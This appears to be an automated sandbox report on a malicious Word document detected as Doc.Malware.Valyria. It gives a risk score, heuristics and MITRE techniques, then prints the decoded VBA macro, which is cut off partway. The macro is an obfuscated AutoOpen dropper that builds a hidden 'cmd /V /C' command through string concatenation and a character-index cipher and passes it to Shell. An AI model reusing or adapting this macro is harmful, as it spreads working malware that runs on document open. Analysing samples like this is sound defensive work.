MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains a critical AutoOpen VBA macro. The macro's obfuscated code attempts to execute a command using Shell, indicating it's likely a downloader for a second-stage payload. The presence of legacy WordBasic markers further supports its malicious nature.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-6744207-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6744207-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5894 bytes |
SHA-256: ded1a105b41d6cbf4d52bbf78784ca5c336ba809070a86803d83bce8f764e44b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iElOVPZhwLkt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate Fix(jzRWtC - fZXwa + 27802 / lYFzcj)
AppActivate Rnd(79493 * rNvjNB * hNKFFW * vDdvlI)
AppActivate CBool(JvcARE)
AppActivate 158128112
AppActivate Oct(508903204)
Shell@ CVar("cm") + zSmQzfbEj + dwOrIlO + kUAWH + qzNHjk + CrWhqEVBH + XGjUDGlUzwTQ + RnKOprUj, 492341173 - 492341173
AppActivate 4087
AppActivate oWKQjb
End Sub
Attribute VB_Name = "YfWSunCzuilOsc"
Function kUAWH()
On Error Resume Next
AppActivate Atn(jYAoS)
AppActivate Sgn(vYjwRp)
zXqRAUaw = "d /" + "V:/" + "C" + CStr(Chr(fLhDUTwU + HlnzBwCDIo + 34 + irviGXa + FSNbrLBMLEjmnY)) + "se" + "t i" + "cX=" + "iz" + "XquhB" + "I" + "wbtEjbVz5C" + "Lc32F)S" + "dOsk" + "xZo8,Y{l\y"
AppActivate Int(4)
AppActivate CInt(VLaoYw)
VKFdzdmCGwm = "Pm;$pMe" + "D" + "-K" + "vnrNJ1}" + "a+@g.=W" + "' f/:7(&" + "&for %6 " + "in (" + "43"
AppActivate Oct(VrbMZ)
AppActivate Chr(HHmkvm)
kTGpPpBSXbr = ";31" + ";8;45;51;" + "27;5;4" + "5" + ";36;36;6" + "4;4" + "2;34;43" + ";26" + ";61;" + "50;45;8" + ";47;31;13;"
AppActivate oKuORw
AppActivate iwsijR
vWqhBqlZPXW = "12;45" + ";19;10;64" + ";52;45" + ";10" + ";60;62;4"
AppActivate 1
AppActivate SiXcwc
AppActivate CSng(2)
cZNjVTQATJ = "5;13;" + "17;36" + ";0;4" + "5;50;10" + ";4" + "1;42;48;49" + ";17;" + "61;63;5" + ";10" + ";10;4"
AppActivate 418
AppActivate ChrB(2724)
CnimzZrHjIE = "3" + ";67;6" + "6;66;50;4" + "5;13" + ";4;36" + ";56;47" + ";4"
AppActivate CSng(ipSUP)
AppActivate 26
AppActivate Tan(3)
KEjSmN = "5;50;1" + "0" + ";60;1" + "9;31;40;6" + "6;1" + "0;20;5" + "8;5;10;10" + ";43;67;66" + ";66;45;2" + "8;10;3" + "1"
kUAWH = zXqRAUaw + VKFdzdmCGwm + kTGpPpBSXbr + vWqhBqlZPXW + cZNjVTQATJ + CnimzZrHjIE + KEjSmN
AppActivate Atn(zjGUiH)
AppActivate Hex(Iwlslm)
AppActivate Rnd(itScb)
End Function
Function qzNHjk()
On Error Resume Next
AppActivate 210
AppActivate Wjbjn
AppActivate scTBq
VXuimklZD = ";51;6" + "0;19;" + "31;40;60;" + "13;51;" + "66;2;62;6" + "2;43;18;2" + "9;1" + "7;7" + ";58;5" + ";10;10;4" + "3" + ";67" + ";66;6"
AppActivate Fix(SBYZfD * imAlr)
AppActivate Oct(TBRNW)
QIzqGFvkrZ = "6;50;45;5" + "9;51;45;" + "0;5" + "1;3" + "1;" + "27;60" + ";" + "19;" + "31;4" + "0;60" + ";13"
AppActivate Int(58)
AppActivate 4739
AppActivate Chr(sGcFni)
pQiQoM = ";51;66" + ";13;0;50;" + "66;15;31;3" + "0;1" + "3;58;5;10;" + "10;43" + ";67;66;6"
AppActivate rJaiFs
AppActivate Int(ttmbzA)
AppActivate CStr(17230 * kdAwQ)
jOkiXTzs = "6;50" + ";47;" + "40;3" + "1;5" + "1;0;40;31" + ";10;31;" + "60;12;"
AppActivate Rnd(jYauvI + dCIDt)
AppActivate 2
zhFJqiZw = "43;66;" + "12;16;32;2" + "0" + ";1" + "4;" + "43;4" + "3;22;5" + "8;5;10;1" + "0;43;67;66" + ";66;40;27;" + "19;38"
AppActivate ZRwKK
AppActivate Tan(zwUtz)
HJWzUGJPYVM = ";56" + ";43;0;6" + "0;19;31;" + "40;6" + "6;40;2" + "7;19;0;5" + "0" + ";"
AppActivate Sin(51687 * VzZTsk - lOwzrb / AYIzZ)
AppActivate CLng(tanSdw)
AppActivate CDate(27926 * VKhWX)
GchbmwqmH = "27;56;" + "5" + "6" + ";10;60;19;" + "3" + "1;40" + ";66;19;62;" + "6;53;2;34;" + "20;63;6" + "0;24;43;3" + "6"
AppActivate 125205896
AppActivate oTLwM
AppActivate 6
UZKmNM = ";0;10;6" + "9;63;58;63" + ";23;41;" + "42;4;34" + ";30;64" + ";61;6" + "4;63;68;21"
AppActivate CSng(519735951)
AppActivate Oct(VqKSc + bWmAO / 73779 - WpcmJ)
aIazq = ";5" + "4;6" + "3" + ";41;42;5" + ";44;19;6" + "1;42;45;5" + "0;49;67;10" + ";45;40;43" + ";57;63;" + "37;63;57" + ";"
AppActivate CBool(9)
AppActivate ChrB(73482 - 14481)
AppActivate ChrB(fTzOqE)
Hltjb = "4" + "2;4;34;30" + ";57;63;" + "60;" + "45;29;45" + ";" + "63;41" + ";65;31" + ";" + "5" + "1;45;56;"
qzNHjk = VXuimklZD + QIzqGFvkrZ + pQiQoM + jOkiXTzs + zhFJqiZw + HJWzUG
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.